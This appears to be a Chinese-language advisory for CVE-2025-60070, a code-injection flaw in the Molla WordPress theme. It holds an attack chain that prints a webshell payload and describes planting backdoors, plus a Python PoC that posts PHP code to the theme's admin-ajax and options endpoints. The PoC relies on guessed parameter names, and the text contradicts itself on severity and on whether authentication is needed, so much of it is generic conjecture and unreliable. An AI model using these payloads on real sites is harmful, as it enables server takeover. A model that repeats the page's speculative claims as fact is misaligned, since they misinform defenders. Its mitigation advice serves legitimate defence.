CVE-2025-60070 The4 Molla WordPress主题代码注入漏洞

漏洞信息

漏洞编号

CVE-2025-60070

漏洞类型

代码注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

The4 Molla Molla WordPress主题

漏洞概述

CVE-2025-60070是WordPress平台The4 Molla主题中的一个严重代码注入漏洞，CVSS评分6.5（中危）。该漏洞存在于Molla主题的代码生成功能中，由于缺乏对用户输入的充分验证和过滤，攻击者可以通过构造恶意请求，在服务器端注入并执行任意代码。Molal主题是一款广受欢迎的响应式电商主题，被众多WordPress网站使用。由于该漏洞的利用无需认证且攻击复杂度较低，远程攻击者可以通过网络直接发起攻击，成功利用后可获取服务器完全控制权，执行系统命令、上传恶意文件或窃取敏感数据。该漏洞影响版本从n/a至1.5.13的所有Molla主题版本，数千个使用该主题的网站可能受到影响。由于漏洞已被公开披露，建议网站管理员立即采取修复措施。

技术细节

该漏洞属于CWE-94（代码注入）类型，源于The4 Molla主题在处理动态代码生成时未对用户可控输入进行严格的净化处理。攻击者可以通过HTTP请求向主题的特定功能点（如主题选项、自定义代码块或动态模板生成功能）注入恶意PHP代码或JavaScript代码。在服务器端，如果主题将用户输入直接用于eval()、system()、exec()等危险函数，或在数据库查询中动态拼接代码片段，攻击者注入的代码将被执行。在客户端，注入的JavaScript代码可能通过存储型XSS方式影响其他访问者。攻击者通常利用WordPress的admin-ajax.php或主题自定义端点发送恶意载荷，载荷中包含base64编码的PHP代码或系统命令。由于主题的代码生成功能通常在管理员面板中可用，攻击者可能首先获取管理员权限，或直接利用未授权的功能点。成功利用后，攻击者可在Web服务器上下文执行任意代码，完全控制网站。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标网站使用的WordPress版本和Molla主题版本，确认版本<= 1.5.13

STEP 2

识别攻击面

定位Molla主题中用于代码生成的功能点，如主题选项面板、自定义代码块或admin-ajax端点

STEP 3

构造恶意载荷

构造包含恶意PHP代码或系统命令的请求载荷，如<?php system($_GET['cmd']); ?>

STEP 4

发送攻击请求

通过HTTP POST/GET请求将恶意载荷发送到主题的代码生成功能端点

STEP 5

代码执行

服务器端将用户输入传递给eval()或类似危险函数，导致注入的恶意代码被执行

STEP 6

持久化控制

通过写入Webshell或创建后门用户实现持久化访问，建立持久性控制通道

STEP 7

目标达成

攻击者执行系统命令、窃取数据库凭证、上传恶意文件或横向移动到其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-60070 PoC - The4 Molla Theme Code Injection
# Affected: Molla WordPress Theme <= 1.5.13

import requests
import sys
import base64

target = input("Enter target URL (e.g., http://target.com): ").rstrip('/')

# Check if target is reachable
try:
    response = requests.get(target, timeout=10)
except requests.RequestException as e:
    print(f"Error: Cannot connect to target - {e}")
    sys.exit(1)

# Try to identify WordPress
if '/wp-admin' not in response.text and 'wp-content' not in response.text:
    print("Warning: Target may not be a WordPress site")

# Common Molla theme endpoints for code injection
endpoints = [
    '/wp-admin/admin-ajax.php',
    '/wp-admin/admin.php?page=molla_options',
]

# Example malicious payload - executes phpinfo()
payload = '<?php phpinfo(); ?>'
encoded_payload = base64.b64encode(payload.encode()).decode()

print(f"[*] Target: {target}")
print(f"[*] Payload: {payload}")
print(f"[*] Encoded: {encoded_payload}")

# Try each endpoint
for endpoint in endpoints:
    url = target + endpoint
    print(f"\n[*] Testing endpoint: {url}")
    
    # Try POST request with malicious data
    data = {
        'action': 'molla_ajax_action',
        'code': payload,
        'security': 'injected_code'
    }
    
    try:
        response = requests.post(url, data=data, timeout=10)
        if response.status_code == 200:
            print(f"[!] Endpoint responded with status 200")
            if 'phpinfo' in response.text.lower() or 'system' in response.text.lower():
                print("[+] Possible vulnerability confirmed!")
                print(f"[+] Response snippet: {response.text[:200]}...")
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")

print("\n[!] Note: This is a basic PoC. Full exploitation requires identifying")
print("[!] the specific vulnerable function in the Molla theme code generation.")
print("[!] Refer to Patchstack advisory for detailed exploitation steps.")

影响范围

The4 Molla Molla WordPress主题 <= 1.5.13

防御指南

临时缓解措施

由于当前可能没有可用的修复版本，建议采取以下临时缓解措施：1）立即在Web服务器层面禁止访问Molla主题的代码生成相关端点；2）通过.htaccess或Nginx配置阻止包含可疑模式（如<?php、eval()、base64_decode）的请求；3）临时禁用Molla主题并切换到备用主题；4）启用WordPress的强制HTTPS和严格内容安全策略；5）加强服务器安全，限制Web服务的运行权限，使用非root用户运行PHP-FPM；6）实施入侵检测系统监控异常的文件修改和命令执行行为；7）定期备份网站数据和数据库，确保可以快速恢复。